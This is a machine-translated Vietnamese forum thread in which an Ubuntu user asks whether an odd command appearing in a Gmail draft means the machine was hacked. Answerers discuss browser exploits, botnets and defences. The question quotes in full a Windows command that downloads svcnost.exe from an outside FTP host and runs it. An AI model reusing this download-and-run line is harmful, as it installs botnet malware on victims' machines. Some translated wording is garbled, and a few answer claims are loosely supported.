Làm cách nào để xác định xem máy tính Linux của tôi có bị hack không?

PC nhà tôi thường bật, nhưng màn hình tắt. Tối nay tôi đi làm về và thấy có vẻ như là một nỗ lực hack: trong trình duyệt của tôi, Gmail của tôi đã mở (đó là tôi), nhưng nó ở chế độ soạn thảo với nội dung sau TO:

md / c echo mở cCTeamFtp.yi.org 21 >> ik & echo user ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & thoát echo Bạn đã sở hữu

Điều này trông giống như mã dòng lệnh Windows đối với tôi và sự mdkhởi đầu của mã kết hợp với thực tế là Gmail đang ở chế độ soạn thảo, điều này chứng minh rằng ai đó đã cố chạy một cmdlệnh. Tôi đoán tôi đã may mắn vì trên thực tế tôi không chạy Windows trên PC này, nhưng tôi có những người khác làm điều đó. Đây là lần đầu tiên xảy ra chuyện như thế này với tôi. Tôi không phải là một chuyên gia về Linux và lúc đó tôi không chạy bất kỳ chương trình nào khác ngoài Firefox.

Tôi hoàn toàn chắc chắn rằng tôi đã không viết điều này và không có ai khác ở máy tính của tôi. Ngoài ra, gần đây tôi đã thay đổi mật khẩu Google (và tất cả các mật khẩu khác của tôi) thành một cái gì đó giống như vMA8ogd7bvvậy nên tôi không nghĩ rằng ai đó đã hack tài khoản Google của tôi.

Chuyện gì vừa xảy ra vậy? Làm thế nào để ai đó đưa tổ hợp phím vào máy tính của tôi khi nó không phải là máy Windows cũ của bà đã chạy phần mềm độc hại trong nhiều năm, mà là một bản cài đặt Ubuntu mới gần đây?

Cập nhật:
Hãy để tôi giải quyết một số điểm và câu hỏi:

• Tôi đang ở Áo, ở nông thôn. Bộ định tuyến WLAN của tôi chạy WPA2 / PSK và mật khẩu trung bình không có trong từ điển; sẽ phải là vũ phu và cách đây chưa đến 50 mét; không có khả năng nó đã bị hack.
• Tôi đang sử dụng bàn phím có dây USB, vì vậy một lần nữa rất khó có ai có thể nằm trong phạm vi để hack nó.
• Tôi đã không sử dụng máy tính của tôi tại thời điểm đó; nó chỉ ở nhà khi tôi đang làm việc. Đó là một PC nettop gắn trên màn hình, vì vậy tôi hiếm khi tắt nó đi.
• Máy chỉ mới hai tháng tuổi, chỉ chạy Ubuntu và tôi không sử dụng phần mềm lạ hoặc truy cập các trang web lạ. Đó chủ yếu là Stack Exchange, Gmail và báo chí. Không có trò chơi. Ubuntu được thiết lập để giữ cho đến nay.
• Tôi không biết về bất kỳ dịch vụ VNC nào đang chạy; Tôi chắc chắn chưa cài đặt hoặc kích hoạt một. Tôi cũng chưa bắt đầu bất kỳ máy chủ nào khác. Tôi không chắc chắn nếu có bất kỳ đang chạy trong Ubuntu theo mặc định?
• Tôi biết tất cả các địa chỉ IP trong hoạt động tài khoản của Gmail. Tôi khá chắc chắn Google không phải là một lối vào.
• Tôi đã tìm thấy Trình xem tệp nhật ký , nhưng tôi không biết phải tìm gì. Cứu giúp?

Điều tôi thực sự muốn biết là, và điều thực sự khiến tôi cảm thấy không an toàn, đó là: làm thế nào bất cứ ai từ Internet có thể tạo ra tổ hợp phím trên máy của tôi? Làm thế nào tôi có thể ngăn chặn điều đó mà không phải tất cả tin đồn về nó? Tôi không phải là một người đam mê Linux, tôi là một người cha đã sử dụng Windows trong hơn 20 năm và cảm thấy mệt mỏi với nó. Và trong tất cả hơn 18 năm hoạt động trực tuyến, cá nhân tôi chưa bao giờ thấy bất kỳ nỗ lực hack nào, vì vậy đây là điều mới đối với tôi.

Tôi nghi ngờ bạn có bất cứ điều gì để lo lắng. Nhiều khả năng là một cuộc tấn công JavaScript đã cố gắng thực hiện một ổ đĩa bằng cách tải xuống . Nếu bạn lo lắng về điều này xảy ra, hãy bắt đầu sử dụng Tiện ích bổ sung Firefox của NoScript và AdBlock Plus .

Ngay cả việc truy cập các trang web đáng tin cậy bạn cũng không an toàn vì chúng chạy mã JavaScript từ các nhà quảng cáo bên thứ ba có thể độc hại.

Tôi lấy nó và chạy nó trong một VM. Nó đã cài đặt mirc và đây là nhật ký trạng thái ... http://pastebin.com/Mn85akMk

Đây là một cuộc tấn công tự động đang cố gắng giúp bạn tải xuống mIRC và tham gia một mạng botnet sẽ biến bạn thành một spambot ... Nó đã tham gia VM của tôi và tạo kết nối đến một số địa chỉ từ xa khác nhau autoemail-119.west320.com.

Chạy nó trong Windows 7 Tôi phải chấp nhận lời nhắc UAC và cho phép nó truy cập thông qua tường lửa.

Dường như có rất nhiều báo cáo về lệnh chính xác này trên các diễn đàn khác, và thậm chí có người nói rằng một tệp torrent đã cố thực thi nó khi tải xuống xong ... Tôi không chắc chắn làm thế nào có thể xảy ra.

Tôi đã không sử dụng cái này cho mình, nhưng nó sẽ có thể hiển thị cho bạn các kết nối mạng hiện tại để bạn có thể xem liệu bạn có được kết nối với một cái gì đó ngoài định mức hay không: http://netactview.sourceforge.net/doad.html

Tôi đồng ý với @ jb48394 rằng đó có thể là một khai thác JavaScript, giống như mọi thứ khác hiện nay.

Thực tế là nó đã cố mở một cmdcửa sổ (xem bình luận của @ torbengb ) và chạy một lệnh độc hại, thay vì chỉ tải trojan một cách kín đáo trong nền, cho thấy rằng nó khai thác một số lỗ hổng trong Firefox cho phép nó xâm nhập vào các phím, nhưng không chạy mã.

Điều này cũng giải thích tại sao khai thác này, được viết rõ ràng dành riêng cho Windows, cũng sẽ hoạt động trong Linux: Firefox chạy JavaScript theo cách tương tự trong tất cả các hệ điều hành (ít nhất là, nó cố gắng :)) . Nếu nó được gây ra bởi lỗi tràn bộ đệm hoặc khai thác tương tự dành cho Windows, thì nó đã bị sập chương trình.

Về việc mã JavaScript đến từ đâu - có thể là quảng cáo độc hại của Google (chu kỳ quảng cáo trong Gmail suốt cả ngày) . Nó sẽ không có sự đầu tiên thời gian .

Tôi tìm thấy một cuộc tấn công tương tự trên một máy Linux khác. Có vẻ như đó là một loại lệnh FTP cho Windows.

Điều này không trả lời toàn bộ câu hỏi của bạn, nhưng trong tệp nhật ký tìm kiếm các lần đăng nhập thất bại.

Nếu có nhiều hơn năm lần thất bại trong nhật ký của bạn, thì ai đó đã cố gắng bẻ khóa root. Nếu có một nỗ lực đăng nhập thành công roottrong khi bạn rời khỏi máy tính của mình, HÃY THAY ĐỔI MẬT KHẨU CỦA BẠN NGAY LẬP TỨC !! Ý tôi là NGAY BÂY GIỜ! Tốt nhất là để một cái gì đó chữ và số, và khoảng 10 ký tự dài.

Với các thông điệp mà bạn nhận được (các echolệnh), điều này thực sự nghe giống như một số kiddie kịch bản chưa trưởng thành . Nếu đó là một hacker thực sự biết anh ta đang làm gì, có lẽ bạn vẫn sẽ không biết về nó.

whois báo cáo west320.com thuộc sở hữu của Microsoft.

UPnP và Vino (Hệ thống -> Tùy chọn -> Máy tính từ xa) kết hợp với mật khẩu Ubuntu yếu?

Bạn đã sử dụng bất kỳ kho lưu trữ không tiêu chuẩn?

DEF CON có một cuộc thi Wi-Fi mỗi năm để có thể đạt được một điểm truy cập Wi-Fi cách xa - cuối cùng tôi nghe nó là 250 dặm.

Nếu bạn thực sự muốn sợ hãi, hãy nhìn vào ảnh chụp màn hình của một trung tâm điều khiển chỉ huy của mạng botnet Zeus . Không có máy nào an toàn, nhưng Firefox trên Linux an toàn hơn các máy còn lại. Thậm chí tốt hơn, nếu bạn chạy SELinux .